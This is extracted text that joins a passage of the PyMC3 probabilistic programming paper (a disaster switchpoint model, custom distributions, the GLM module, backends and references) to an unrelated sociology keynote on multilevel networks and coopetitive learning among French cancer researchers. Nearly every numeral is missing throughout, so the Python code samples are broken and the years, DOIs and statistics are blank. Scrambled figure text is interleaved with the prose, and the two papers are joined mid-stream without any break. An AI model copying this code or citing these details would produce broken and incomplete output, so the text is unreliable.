, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , - , , , , , , , , , , , , , , , , , , , , , , , , , , , ], value=- ) year = np.arange( , ) plot(year, disaster_data, ’o’, markersize= ); ylabel("disaster count") xlabel("year") counts of disasters in the time series is thought to follow a poisson process, with a relatively large rate parameter in the early part of the time series, and a smaller rate in the later part. the bayesian approach to such a problem is to treat the change point as an unknown quantity in the model, and assign it a prior distribution, which we update to a posterior using the evidence in the dataset. in our model, dt ∼pois(rt ) rt = { l, if t < s e, if t ≥ s s∼unif(tl,th) e∼exp( ) l ∼exp( ) the parameters are defined as follows: • dt : the number of disasters in year t • rt : the rate parameter of the poisson distribution of disasters in year t. • s: the year in which the rate parameter changes (the switchpoint). • e: the rate parameter before the switchpoint s. • l: the rate parameter after the switchpoint s. • tl, th: the lower and upper boundaries of year t. from pymc import discreteuniform, poisson, switch with model() as disaster_model: switchpoint = discreteuniform(’switchpoint’, lower=year.min(), upper=year.max(), testval= ) # priors for pre- and post-switch rates number of disasters early_rate = exponential(’early_rate’, ) salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. late_rate = exponential(’late_rate’, ) # allocate appropriate poisson rates to years before and after current rate = switch(switchpoint >= year, early_rate, late_rate) disasters = poisson(’disasters’, rate, observed=disaster_data) this model introduces discrete variables with the poisson likelihood and a discrete- uniform prior on the change-point s. our implementation of the rate variable is as a conditional deterministic variable, where its value is conditioned on the current value of s. rate = switch(switchpoint >= year, early_rate, late_rate) the conditional statement is realized using the theano function switch, which uses the first argument to select either of the next two arguments. missing values are handled concisely by passing a maskedarray or apandas.dataframe with nan values to the observed argument when creating an observed stochastic random variable. from this, pymc automatically creates another random variable, disasters.missing_values, which treats the missing values as unobserved stochastic nodes. all we need to do to handle the missing values is ensure we assign a step method to this random variable. unfortunately, because they are discrete variables and thus have no meaningful gradient, we cannot use nuts for sampling either switchpoint or the missing disaster observations. instead, we will sample using a metroplis step method, which implements self-tuning metropolis-hastings, because it is designed to handle discrete values. here, the sample function receives a list containing both the nuts and metropolis samplers, and sampling proceeds by first applying step then step at each iteration. from pymc import metropolis with disaster_model: step = nuts([early_rate, late_rate]) step = metropolis([switchpoint, disasters.missing_values[ ]] ) trace = sample( , step=[step , step ]) [----------------- %-----------------] of complete in . sec in the trace plot (fig. ) we can see that there is about a year span that’s plausible for a significant change in safety, but a -year span that contains most of the probability mass. the distribution is jagged because of the jumpy relationship between the year switch-point and the likelihood and not due to sampling error. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. fr eq ue nc y switchpoint s am pl e va lu e switchpoint . . . . . . . . . . . . . . . . . . . fr eq ue nc y early_rate_log . . . . . . . . . s am pl e va lu e early_rate_log . . . . . . . . . . . . . . fr eq ue nc y late_rate_log . . . . . . s am pl e va lu e late_rate_log fr eq ue nc y disasters_missing s am pl e va lu e disasters_missing . . . . . . . . . . . . . . fr eq ue nc y early_rate . . . . . . s am pl e va lu e early_rate . . . . . . . . . . . . . . . fr eq ue nc y late_rate . . . . . . . s am pl e va lu e late_rate figure posterior distributions and traces from disasters change point model. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pymc features arbitrary deterministic variables due to its reliance on theano, pymc provides many mathematical functions and operators for transforming random variables into new random variables. however, the library of functions in theano is not exhaustive, therefore pymc provides functionality for creating arbitrary theano functions in pure python, and including these functions in pymc models. this is supported with the as_op function decorator. import theano.tensor as t from theano.compile.ops import as_op @as_op(itypes=[t.lscalar], otypes=[t.lscalar]) def crazy_modulo (value): if value > : return value % else : return (-value + ) % with model() as model_deterministic: a = poisson(’a’, ) b = crazy_modulo (a) theano requires the types of the inputs and outputs of a function to be declared, which are specified for as_op by itypes for inputs and otypes for outputs. an important drawback of this approach is that it is not possible for theano to inspect these functions in order to compute the gradient required for the hamiltonian-based samplers. therefore, it is not possible to use the hmc or nuts samplers for a model that uses such an operator. however, it is possible to add a gradient if we inherit from theano.op instead of using as_op. arbitrary distributions the library of statistical distributions in pymc , though large, is not exhaustive, but pymc allows for the creation of user-defined probability distributions. for simple statistical distributions, the densitydist function takes as an argument any function that calculates a log-probability log(p(x)). this function may employ other parent random variables in its calculation. here is an example inspired by a blog post by vanderplas ( ), where jeffreys priors are used to specify priors that are invariant to transformation. in the case of simple linear regression, these are: β∝( +β ) / σ ∝ σ . the logarithms of these functions can be specified as the argument to densitydist and inserted into the model. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. import theano.tensor as t from pymc import densitydist, uniform with model() as model: alpha = uniform(’intercept’, - , ) # create custom densities beta = densitydist(’beta’, lambda value: - . * t.log( + value** ), testval= ) eps = densitydist(’eps’, lambda value: -t.log(t.abs_(value)), testval= ) # create likelihood like = normal(’y_est’, mu=alpha + beta * x, sd=eps, observed=y) for more complex distributions, one can create a subclass of continuous or discrete and provide the custom logp function, as required. this is how the built-in distributions in pymc are specified. as an example, fields like psychology and astrophysics have complex likelihood functions for a particular process that may require numerical approximation. in these cases, it is impossible to write the function in terms of predefined theano operators and we must use a custom theano operator using as_op or inheriting from theano.op. implementing the beta variable above as a continuous subclass is shown below, along with a sub-function using the as_op decorator, though this is not strictly necessary. from pymc .distributions import continuous class beta(continuous): def __init__(self, mu, *args, **kwargs): super(beta, self).__init__(*args, **kwargs) self.mu = mu self.mode = mu def logp(self, value): mu = self.mu return beta_logp(value - mu) @as_op(itypes=[t.dscalar], otypes=[t.dscalar]) def beta_logp(value): return - . * np.log( + (value)** ) with model() as model: beta = beta(’slope’, mu= , testval= ) generalized linear models the generalized linear model (glm) is a class of flexible models that is widely used to estimate regression relationships between a single outcome variable and one or multiple predictors. because these models are so common, pymc offers a glm submodule that salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. allows flexible creation of simple glms with an intuitive r-like syntax that is implemented via the patsy module. the glm submodule requires data to be included as a pandas dataframe. hence, for our linear regression example: # convert x and y to a pandas dataframe import pandas df = pandas.dataframe({’x ’: x , ’x ’: x , ’y’: y}) the model can then be very concisely specified in one line of code. from pymc .glm import glm with model() as model_glm: glm(’y ~ x + x ’, df) the error distribution, if not specified via the family argument, is assumed to be normal. in the case of logistic regression, this can be modified by passing in a binomial family object. from pymc .glm.families import binomial df_logistic = pandas.dataframe({’x ’: x , ’x ’: x , ’y’: y > }) with model() as model_glm_logistic: glm(’y ~ x + x ’, df_logistic, family=binomial()) models specified via glm can be sampled using the same sample function as standard pymc models. backends pymc has support for different ways to store samples from mcmc simulation, called backends. these include storing output in-memory, in text files, or in a sqlite database. by default, an in-memory ndarray is used but for very large models run for a long time, this can exceed the available ram, and cause failure. specifying a sqlite backend, for example, as the trace argument to sample will instead result in samples being saved to a database that is initialized automatically by the model. from pymc .backends import sqlite with model_glm_logistic: backend = sqlite(’logistic_trace.sqlite’) trace = sample( , metropolis(), trace=backend) [----------------- %-----------------] of complete in . sec a secondary advantage to using an on-disk backend is the portability of model output, as the stored trace can then later (e.g., in another session) be re-loaded using the load function: salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from pymc .backends.sqlite import load with basic_model: trace_loaded = load(’logistic_trace.sqlite’) discussion probabilistic programming is an emerging paradigm in statistical learning, of which bayesian modeling is an important sub-discipline. the signature characteristics of prob- abilistic programming–specifying variables as probability distributions and conditioning variables on other variables and on observations–makes it a powerful tool for building models in a variety of settings, and over a range of model complexity. accompanying the rise of probabilistic programming has been a burst of innovation in fitting methods for bayesian models that represent notable improvement over existing mcmc methods. yet, despite this expansion, there are few software packages available that have kept pace with the method- ological innovation, and still fewer that allow non-expert users to implement models. pymc provides a probabilistic programming platform for quantitative researchers to implement statistical models flexibly and succinctly. a large library of statistical distributions and several pre-defined fitting algorithms allows users to focus on the scientific problem at hand, rather than the implementation details of bayesian modeling. the choice of python as a development language, rather than a domain-specific language, means that pymc users are able to work interactively to build models, introspect model objects, and debug or profile their work, using a dynamic, high-level programming language that is easy to learn. the modular, object-oriented design of pymc means that adding new fitting algorithms or other features is straightforward. in addition, pymc comes with several features not found in most other packages, most notably hamiltonian-based samplers as well as automatical transforms of constrained random variables which is only offered by stan. unlike stan, however, pymc supports discrete variables as well as non-gradient based sampling algorithms like metropolis-hastings and slice sampling. development of pymc is an ongoing effort and several features are planned for future versions. most notably, variational inference techniques are often more efficient than mcmc sampling, at the cost of generalizability. more recently, however, black-box variational inference algorithms have been developed, such as automatic differentiation variational inference (advi) (kucukelbir et al., ). this algorithm is slated for addition to pymc . as an open-source scientific computing toolkit, we encourage researchers developing new fitting algorithms for bayesian models to provide reference implementations in pymc . since samplers can be written in pure python code, they can be implemented generally to make them work on arbitrary pymc models, giving authors a larger audience to put their methods into use. additional information and declarations funding the authors received no funding for this work. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests thomas v. wiecki is an employee of quantopian inc. john salvatier is an employee of ai impacts. author contributions • john salvatier, thomas v. wiecki and christopher fonnesbeck conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/pymc-devs/uq_chapter. references bastien f, lamblin p, pascanu r, bergstra j, goodfellow i, bergeron a, bouchard n, warde-farley d, bengio y. . theano: new features and speed improvements. arxiv preprint. arxiv: . . behnel s, bradshaw r, citro c, dalcin l, seljebotn ds, smith k. . cython: the best of both worlds. computing in science & engineering ( ): – doi . /mcse. . . bergstra j, breuleux o, bastien f, lamblin p, pascanu r, desjardins g, turian j, warde-farley d, bengio y. . theano: a cpu and gpu math expression compiler. in: proceedings of the python for scientific computing conference (scipy), vol. . austin: scipy, . available at http://www.iro.umontreal.ca/~lisa/pointeurs/theano_ scipy .pdf . duane s, kennedy ad, pendleton bj, roweth d. . hybrid monte carlo. physics letters b ( ): – doi . / - ( ) -x. goodman n, mansinghka v, roy d, bonawitz k, tarlow d. . church: a language for generative models. arxiv preprint. arxiv: . . goodman nd, stuhlmüller a. . the design and implementation of probabilistic programming languages. available at http://webppl.org/ . hoffman md, gelman a. . the no-u-turn sampler: adaptively setting path lengths in hamiltonian monte carlo. journal of machine learning research : – . jarrett r. . a note on the intervals between coal-mining disasters. biometrika ( ): – doi . /biomet/ . . . kucukelbir a, ranganath r, gelman a, blei d. . automatic variational inference in stan. in: advances in neural information processing systems. red hook: curran & associates, inc., – . kulkarni t, kohli p, tenenbaum j, mansinghka v. . picture: an imperative probabilistic programming language for scene perception. available at https:// mrkulk.github.io/www_cvpr / .pdf . salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pymc-devs/uq_chapter http://arxiv.org/abs/ . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /mcse. . http://www.iro.umontreal.ca/~lisa/pointeurs/theano_scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano_scipy .pdf http://dx.doi.org/ . / - ( ) -x http://arxiv.org/abs/ . http://webppl.org/ http://dx.doi.org/ . /biomet/ . . https://mrkulk.github.io/www_cvpr / .pdf https://mrkulk.github.io/www_cvpr / .pdf http://dx.doi.org/ . /peerj-cs. mansinghka v, selsam d, perov y. . venture: a higher-order probabilistic program- ming platform with programmable inference. arxiv preprint. arxiv: . v . minka t, winn j, guiver j, knowles d. . infer.net . . cambridge: microsoft research. pfeffer a. . figaro: a language for probabalistic programming. available at http: //www.github.com/p t /figaro. python software foundation. . python language reference. version . . available at http://www.python.org . ritchie d. . quicksand: a low-level probabilistic programming framework embed- ded in terra. available at http://dritchie.github.io/quicksand/ . spiegelhalter dj, thomas a, best ng, gilks wr. . bugs: bayesian inference using gibbs sampling, version . . cambridge: mrc biostatistics unit. stan development team. . stan: a c++ library for probability and sampling. version . . available at http://mc-stan.org/ . vanderplas j. . frequentism and bayesianism: a python-driven primer. arxiv preprint. arxiv: . . van der walt s, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science & engineering : – . wood f, van de meent jw, mansinghka v. . a new approach to probabilistic programming inference. in: proceedings of the th international conference on artificial intelligence and statistics, – . salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . v http://www.github.com/p t /figaro http://www.github.com/p t /figaro http://www.python.org http://dritchie.github.io/quicksand/ http://mc-stan.org/ http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. © author. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- . embarked on social processes (the rivers) in dynamic and multilevel networks (the boats) emmanuel lazega* institut d’etudes politiques de paris, iuf, cso-cnrs, rue amélie, paris, france. *e-mail: emmanuel.lazega@ sciencespo.fr text of keynote presentation at the sunbelt xxxviii in utrecht, . revised and resubmitted for publication in connections. may . abstract this paper is the written text underlying the keynote presentation at the sunbelt xxxviii in utrecht, . it presents a neo-structural approach to social processes in the organizational society and the usefulness of the analyses of multilevel networks to understand how we navigate these processes and are made aware of them when we face cooperation dilemmas. empirical illustrations look at how multilevel networks and relational infrastructures are useful to research a process such as coopetitive learning in science, business and government. a con clusion focuses on the role of multilevel relational infrastructures in institutional entrepreneurship, social change and politics, as well as on our responsibility to develop our knowledge of these social processes and multilevel relational infrastructures as open science. keywords social processes, cooperation dilemmas, multilevel networks, multilevel relational infrastructures, coopetitive learning, institutional entrepreneurship, politics, open science, neo-structural sociology. embarked on social processes in the organizational society the main social processes in which sociology has been interested since the nineteenth century are solidarity and exclusion; deviance, control and conflict resolution; regulation and institutionalization; and learning and socialization. to say that these processes are social is to say that much of their deployment is always problematic and beyond our individual control. even when we can influence one of their episodes or components, we are embarked in/by them, cannot stop them, and necessarily navigate their tumultuous course with others. together, these processes can be considered to be social capital of the collective. navigating our course in these processes with others makes everyone interdependent, and interdependencies are thus too important to be left unorganized. we are thus reminded of this navigation each time we meet cooperation dilemmas. to manage these dilemmas, individuals and societies try to organize these interdependencies with structure and culture; for example, with relational infrastructures reflecting vertical differentiations (forms of status), horizontal differentiations (forms of division of work) and norms of behavior and exchanges associated with position in the structure created by these differentiations. structure, culture and agency as analytically distinct operate in conjunction with each other and drive each other’s evolution. among indicators of these interdependencies, we find impersonal interactions and personalized relationships. today, the focus is on personalized relationships and relational infrastructures, especially multilevel relational infrastructures. we define rela- tionships as channels for resources and moral commitments with the exchange partners. specified by culture and agency, relationships combine into relational patterns and these patterns are the relational infrastructures shaping the social processes identified above. relational infrastructures are the backbones of certain forms of organized collective action and production, which we call collegial (not to be confused with congenial). since all the social processes connections identified above have a relational dimension, studying them from the perspective of this relational dimension adds to their sociological understanding. the study of the association between position in the social structure and behavior, as revisited by white et al. ( ) and developed in particular by insna members, has contributed to understanding this navigation. when personalized relationships are stabilized, they form relational infrastructures (for example, dimensions of status measured by centrality, or division of work approached with blockmodels) that both help members of the collective manage their cooperation dilemmas and constrain them. they represent complex opportunity and constraint structures (white, ) nested in social classes that, at some periods in history, facilitate mobilizations, accumulation and opportunity hoarding (tilly, ). this new structural analysis was bolstered during subsequent decades by specialized statistical models for networks as dependent variables. in these models exogenous effects, i.e. based for example on class, gender, ethnic affiliations, occupation, formal status, etc., bring into the picture the wider social context and its conflicts to understand and explain the formation of networks at different levels of granularity: dyadic (with p models, e.g., van duijn et al., ), triadic or higher order levels (with ergms, e.g., pattison and wasserman, ; snijders et al., ; wasserman and robins, ), and thus of relational infrastructures. this rigorous methodology has helped to analyze and to contextualize the deployment of the social processes and their navigation. further sophistication and stabilization of these analyses look at the co-evolution of these networks, behaviors, normative choices and positions (e.g. dynamics in snijders’, , ; snijders and steglich (forthcoming), analyses of longitudinal network data) where networks are both contexts and contextualized. this neo-structuralism recognizes that the management of interdependencies and cooperation dilemmas have certainly always been sophisticated and complex. however, as shown by modern sociologists – from weber ( ) to presthus ( ), coleman ( ), perrow ( ), lindenberg ( ), wittek ( ), wittek and van de bunt ( ), wittek and van witteloostuijn ( ) – the organization of interdependencies is today further characterized by the fact that we now live in an “organizational society.” in this organizational society, the meso-level of social order (and therefore the construction of the macro level) is dominated by those who control organizations as “tools with a life of their own” (selznick, , ) that tend to “absorb societal functions” (perrow, ). this perspective focuses the attention on the necessity to factor into the analyses – of relational interdependencies and infrastructures, social pro- cesses and their navigation – much more than in the recent past, the fact that society is stratified by superposed levels of organized collective action. the study of structure, culture and agency has to take this vertical, multilevel dimension of social phenomena much more into account. understanding navigation of social processes with the analyses of multilevel networks the concept of duality (breiger, ; further developed by fararo and doreian, and many others), in which individuals and groups/organizations co-constitute each other, is central to understand this vertical and multilevel dimension of the organizational society. in particular, it can mean that position in the organizational society is built from at least two levels of collective agency: inter-individual and inter- organizational. to revisit theories of tumultuous and often violent social processes and their collective navigation in the organizational society, we argue that it is useful to look at this navigation at least at two superposed levels of collective agency, simultaneously. a level is defined here as a system of collective agency with the same vertical and horizontal differentiations between members as those considered in the previous section (i.e. multiple dimensions of socio economic status and forms of division of work). actors at each level can be the individuals (affiliated in the organizations) or organizations (companies, government administrations, professions, associations, cooperatives, etc., affiliating individuals). individuals build relationships within and across organizational boundaries; and organizations build an inter-organizational field or system (industry, policy domain, etc.) in selznick’s ( ) sense of “dynamic configuring fields”. at each level, we find all the generic social processes and the relational infrastructures that help navigate them. each level can be represented as a network that is homogeneous with respect to type of actors, as in figure , and these structures can be analyzed as made up of units of analysis that are pairs of person-organization, in which the person is affiliated in the organization. in general terms, looking at the characteristics of such pairs helps to further understand position in the social structure, i.e. individuals dually positioned in superposed levels of collective agency. duality as co-constitution of one level with the other can be further modelled here using what snijders ( ) calls “analysis of multilevel networks” embarked on social processes in dynamic and multilevel networks (amn), as differentiated from “multilevel network analysis” (mna). in this approach, each level is context for the other and represents a form of collective agency (wasserman and iacobucci, ; parcel et al., ; lazega, ; lazega et al., ; lazega and snijders, ). such networks overlap and coevolve in complex ways, and these overlaps become indicators of meso-level context for individual relational strategies across boundaries, but also for the construction of macro-level structures (social stratification and inequalities). each level is context for the other. statistical models helping explore the emergence and determinants of such structures are provided, for example, by snijders and bosker ( ), koskinen et al. ( ), wang et al. ( , ), Žiberna ( ), Žiberna and lazega ( ), zappa and lomi ( ), tranmer et al. ( ). today i would like to report some of our explorations of how these multilevel dynamics work, based on datasets following this linked design. economic sociology offers many example of such forms of coopetition (brailly et al., , provide an overview), understood as paradoxical cooperative competition. they show how these overlap and their management always matter in understanding markets, more generally contexts where coopetition is vital. in this domain, this multilevel perspective has provided a new network boundary specification technique, as illustrated and developed by eloire ( ), eloire et al. ( ), penalva-icher ( ), oubenal ( ), piña-stranger and lazega ( ), brailly ( ), favre et al. ( ), who all look at how competitors cooperating in markets navigate social processes with relational infrastructures. first, they list all organizations active in the field of study, and their interdependencies. second, they list the main individuals who are affiliated in these organizations and know about the latters’ strategies, policies, interdependencies, exchanges, coordination efforts and capacity for resilience. this technique samples individuals, with all the limitations of samples, but is nevertheless useful as an exploratory technique when the researcher knows that the sample represents an organized community with inter-individual and inter-organizational collaborations. third, they elicit interdependencies between these individuals active in the field with data on their activities, division of work, specialties, productivity and performance. this approach has identified overlooked positions and processes, for example the position of vertical linchpins (actors who are active at two levels, simultaneously), dual alters, extended opportunity structures, multilevel matthew effects, etc. if multilevel agency and strategies become so visible in the organizational society, it is preci- sely because they help actors manage both inter- dependencies and conflicts with each other, i.e. coopetition. if the organizational society generalizes coopetition, it is also likely to encourage a form of reflexivity that makes multilevel agency an explicit concern. coopetition itself as an example of this general statement about social life, i.e. coorientation and coordination among actors who still jockey for positions and compete for resources, is as widespread as soccer games. however, in capitalist economies – where the lower the levels of social stratification, the figure : superposed levels of collective agency: inter-individual network, inter-organizational network, and affiliation network. in this multilevel, linked-design structure, the two levels are each made up of different types of units. in the analysis of multilevel networks (amn), as understood here, the unit of analysis is the individual-organization pair. (see ‘catching up with the big fish in the big pond’,social networks, , with marie jourda, lise mounier & rafael stofer) connections more open, direct and systematic the competition forced upon their members – coopetition acquires a different meaning. in many coopetitive fields, for example, individual employees are put in charge of seeking, on a personal basis, information and advice from other employees belonging to different, competing companies, thus figuring out ways for their respective companies to coordinate with one another, i.e. to become relatively friendly competitors instead of engaging in cutthroat competition. thus, a multilevel approach to collective action dynamics in the organizational and market society can identify ways in which companies compete in public, while their employees cooperate in private. in theory, one should deal with such broad issues process by process, relational infrastructure by relational infrastructure, each dataset bringing its additional insights. instead, i will focus here on one single process, coopetitive collective learning, in three different settings. this complexifies even further the tradition of studying learning through advice networks (see for example agneessens and wittek, ; barbillon et al., ; glückler et al., ; krackhardt, ; and many others). these case studies flesh out this multilevel perspective with the amn: the first looks at multilevel coopetition in science; the second in business; the third in government. in these cases, we identify the multilevel relational infrastructures that help coopetitors navigate the focal social process that makes collective action among rival peers possible. examples: navigating coopetitive learning in science, business and government the first example is a study of collective learning and coopetitive performance among public scientists, a population of top cancer researchers in france in − . this case in point focuses on collective learning among highly competitive actors. all are part of science as a multilevel production system with collective action at each level. individuals are researchers, all “sublime” in different ways (eight papers per year in internationally visible journals scanned by cancerlit – later merged into pubmed – for three years in a row between and ). they work in different research laboratories. the two different levels of collective agency are, first, five different inter- individual level advice networks supporting the work of these scientists; and second the inter-organizational level captured by seven networks of resource interdependencies between laboratories (recruitment of postdocs, shared expen sive technology, joint funding and research projects, etc.) supporting the collective projects of these respective organizations. the dominant specialty is still hematology-immunology that was able to associate more systematically with fundamental research since the s. indeed, more than a generation earlier, they had collectively won a race to learn and appropriate molecular biology, and to coopetitively share their experience of using its techniques . multilevel position and relational infrastructures multilevel relational infrastructures, especially multi level status, mainly helped specific researchers navigate the coopetitive learning process. here we roughly identify high and low multi-level status by taking the median in indegrees between individuals (i.e. central – the big fish) and less central (the little fish, below the median), and the same for organizations, combined with size (the big and the small ponds). we can thus identify four positions in multilevel status: the big fish in the big ponds (bfbp), the bfsp, the lfbp and the lfsp. on average performances of these categories differ. impact factor (if) scores are unreliable as measurement of quality of work, but it is nevertheless interesting in our exploratory approach to look at what story they tell. this story is that performances of the bfbp are higher, which is no scoop, but also that over time only the lfbp catch up with the bfbp . this makes sense: only the large and central laboratories have enough resources to help their young postdocs and researchers remain in this highly competitive race. this suggests that characteristics of organizations count more for if performance than characteristics of individual members who navigate the coopetitive system. size and centrality of their laboratory, as well as resources, seem to matter more than their own individual centrality in the advice networks in this segment of the profession. thus, organizations influence and dominate the coopetitive learning process, especially in favor of the bfbp with high epistemic status, as well as the lfbp. organizations are that important because they provide resources, retrospectively, we know that this social system was already in decline. hematologists-immunologists specialized in leukemia still dominated this research field, but the invention of genetic sequencing, then its use by various applied specialties including epidemiological research, was going to extend medical knowledge on solid tumors. napoleon used to say that in politics it is better to be first in one’s provincial village than second in paris. in science, it seems to be the opposite. embarked on social processes in dynamic and multilevel networks functional coordination, but also the social discipline needed to navigate the social processes at hand. one indicator of this social discipline was made available to us thanks to measurement of the perceptions by these researchers of who among the others were their direct competitors. our analyses showed that, under specific conditions, researchers seek advice from, and share experience with, colleagues whom they recognize as direct competitors (lazega et al., ). this was the case almost only among hematologists – immunologists and their laboratories. they were able, more than other specialties, for historical reasons, to turn cutthroat competition into more manageable coopetition, in particular by creating and sustaining this social discipline thanks to multilevel relational infrastructures mentioned above. figure is based on a stochastic blockmodel of two networks (advice and identification of direct competitors), i.e. a model based on probabilities of advice relations between and within blocks conditioned on presence of direct competitors. in this system, when factoring in the direct competition network jointly analyzed with the advice network among peers, only one social niche was identified as capable of this feat. this single social niche in this system (block central in figure ) brings together hamatologists- immunologists. they were the only researchers whose relational infrastructure was helpful in terms of taming cutthroat competition and turning it into more or less friendly competition, thus facilitating the achievement of important results collectively and individually. this specialty was able to self-organize as a “social niche” (which is a relational infrastructure as defined above) over two generations, a block of scientist that not only brought together researchers with the same relational profile in this milieu, but also was capable of collective action as a cohesive group (bernard et al., ). inside the niche, social discipline was strong enough to stop competitors from sharing advice deliberately trying to mislead other members. in addition to resources, only this social niche of big ponds was able to provide this context and social discipline. cross-level agency, overlaps, strategies and resilience but are organizations really thicker than individuals as determinants of such achievements? our answer is yes if you measure their effect cross-sectionally, at least at one point in time. only the lfbp with the right relational behavior learn to catch up with the bfbp over time as part of their heavily relational socialization (lazega, ). indeed variations among the lfbp (especially the young researchers looking for freedom and emancipation, as shown by coromina soler et al., and ziherl et al., ) show that, in such multilevel systems, individual learning strategies matter too, not just their multilevel position. we measure these strategies by looking at the ways in which these scientists manage the overlaps between their own individual network and the network of their organization. we identified four types of overlaps as indicators of multilevel relational strategies: independent (no overlap, the researcher has relationships in the interindividual network that figure : seeking advice and learning from peers identified as direct competitors: managing coopetition with superposed social niches as a collective benefit of multilevel networks. stochastic blockmodel based on the probabilities of advice relations between and within blocks conditioned on presence of direct competitors. the two kinds of links, seeking advice and identifying as a direct competitors, are dependent. in the second block there is a higher proportion of members seeking advice from each other and calling each other direct competitors than in the two other blocks. node size proportional to block size, n = . (see ‘effects of competition on collective learning in advice networks’, social networks, , with avner bar-hen, pierre barbillon, sophie donnet) connections are members of laboratories in which his/her own laboratory does not have relationships at the inter- organizational level); individualist and collectivist have more or less partial overlaps of different sizes; and the fusional strategy means that the researcher, being a good soldier of his/her lab, has relationships in the interindividual network only among members of labs in which his/her own lab has relationships at the inter-organizational level. it is interesting to note that the strategy that characterizes the “winners” in this system (the bfbp and the lfbp) is the individualist strategy. the radical independentist strategy, in particular, seems to be a mistake in this particular context – message for the younger colleagues in the audience. this analysis, as exploratory as it is, strongly suggests that things do not just happen for those in the right place at the right time: individuals in a coopetitive milieu are also strategic in their relational choices. these individual strategies matter in the interplay between levels, but agency and strategy matter particularly over time. a multilevel approach shows in this case that the resilience of personal relationships, i.e. their deliberate maintenance over long periods, explains in part the effectiveness of these strategies, especially when organizations disappear. in our case in point, for many reasons, almost none of the laboratories in which we interviewed these resear- chers and directors still exist today as organized entities: technology and methods have changed with genetic sequencing and genomics, turnover of members and directors have created new structures that have replaced to ones we observed. and nevertheless, the density of co-publication ties between members of this population of researchers is almost as strong years later in as it was in (year of fieldwork). in this case in point, as shown by the comparison, in figure , between the density of the co-publication networks among these scientists in and in , the resilience of personal coworkers’ relationships is impressive. in total, years after fieldwork, all laboratories had disappeared as organized entities, and researchers were in different laboratories. but they still published together, in part with the same colleagues as in . to put it in a simplified way: combined collective learning and personal ties last long after organizations that brought these scientists together disappear. this “long” term resilience of personal co- publication ties, combined with strategies of invest- ment in social discipline and relational infra structures, pay off. this observation limits very much the idea that organizational characteristics have more effect on performance than individual characteristics and agency in this context. the opportunity structure represented by organizations needs personalized ties within this milieu in order to become an important asset and determinant of performance. but one has to look at this effect over time to realize it. position and agency combined in extended opportunity structures: discreet kinds of inequalities if both position and agency matter separately, how do they matter together as determinants of individual performance in this setting? another way in which organizations matter, in addition to providing direct access to resources and a form of social discipline, is in their capacity and willingness to extend the opportunity structure of their members. this means rewarding (from the perspective of the director/ manager of the organization) their members who select the “right” multilevel relational strategies and align with the multilevel relational infrastructures. which of the three strategies that maintain an overlap between the inter-individual and the inter-organizational networks is rewarded by which manager is an underexplored research question. indeed, one more reason why organizations are somewhat thicker than individuals when we look at determinants of this kind of performance is that they can extend members’ opportunity structures by providing access to what we call dual alters, especially dual alters with complementary resources. we have coined the added value for performance derived from indirect, multilevel, manager-enhanced access to resources accruing from an extended opportunity figure : the “long” term resilience of inter-individual collaboration ties over years, long after the different organizations in which they worked have disappeared. (bar-hen & lazega, forthcoming). embarked on social processes in dynamic and multilevel networks structure “network lift from dual alters” (lazega et al., ). we call dual alters actors in the system whom the focal actor does not reach on his/her own, but who can be introduced to the focal actor by his/her director/manager. as shown in figure , network lift from dual alters is equivalent to closing a multilevel -path. when directors/managers share relational capital to give access to dual alters, their members’ performance increases – especially when the dual alters are rich with resources complementary to that of the focal actor. when this occurs, the lfbp catch up with the bfbp. figure visualizes the potential that dual alters represent. it shows all the dual alters with complementary resources accessible to researchers for coopetitive learning and collaborations through their inter-organizational ties. it is interesting to notice that % of the bfsp are both directors and researchers closing multilevel -paths for others, while their if scores still decrease over time. one interpretation of this effect could be that their commitment to their laboratory as a whole comes with this individual cost since they no longer work for themselves but for the collective. it is worth mentioning that this effect increases when we take into account an additional level, i.e. the personal collaboration team of the researcher and its characteristics (lazega and jourda, ). we then have the following different levels: the first level is the focal researcher’s personal collaboration team represented as an ego network (as in burt’s ( ), burt and merluzzi ( ) “within group” entity); the second level is the complete advice network between figure : how can inter-organizational ties be that important to members’ multilevel status? dual alters induced relational capital accessed thanks to closing multilevel -paths. by providing an extended opportunity structures: “network lift” from “dual alters” and a -level matthew effect. they provide a social discipline across organizational boundaries, a discipline that makes it possible to seek advice from direct competitors (otherwise risky). director director researcher i dual alter k (see ‘network lift from dual alters’, european sociological review, , with marie jourda and lise mounier) figure : a potential to realize through multilevel -paths: picture of all dual alters (in red) accessible to researchers (in green) for coopetitive learning and collaborations through their inter- organizational ties (in blue). green nodes are actors i. first circle of blue nodes are organizations in which actors i are affiliated. second circle blue nodes are organizations with which first circle blue nodes are connected. red nodes are dual alters accessible to members (green nodes i) through inter- organizational networks. for the clarity of the picture, ties among members i (whether as focal actors or as dual alters) are not visualized. (see ‘network lift from dual alters’, european sociological review, , with marie jourda and lise mounier) connections all focal researchers in the field; and the third level is the inter-organizational network of laboratories in which these focal researchers are affiliated. the more dual alters with complementary resources one can reach and exchange with, and the denser the collaboration ego network, the higher the performance because the more likely the focal actor is to benefit from the equivalent of a -level matthew effect. indeed in multilevel systems, directors/managers can induce access to dual alters by closing such multilevel -paths. thus 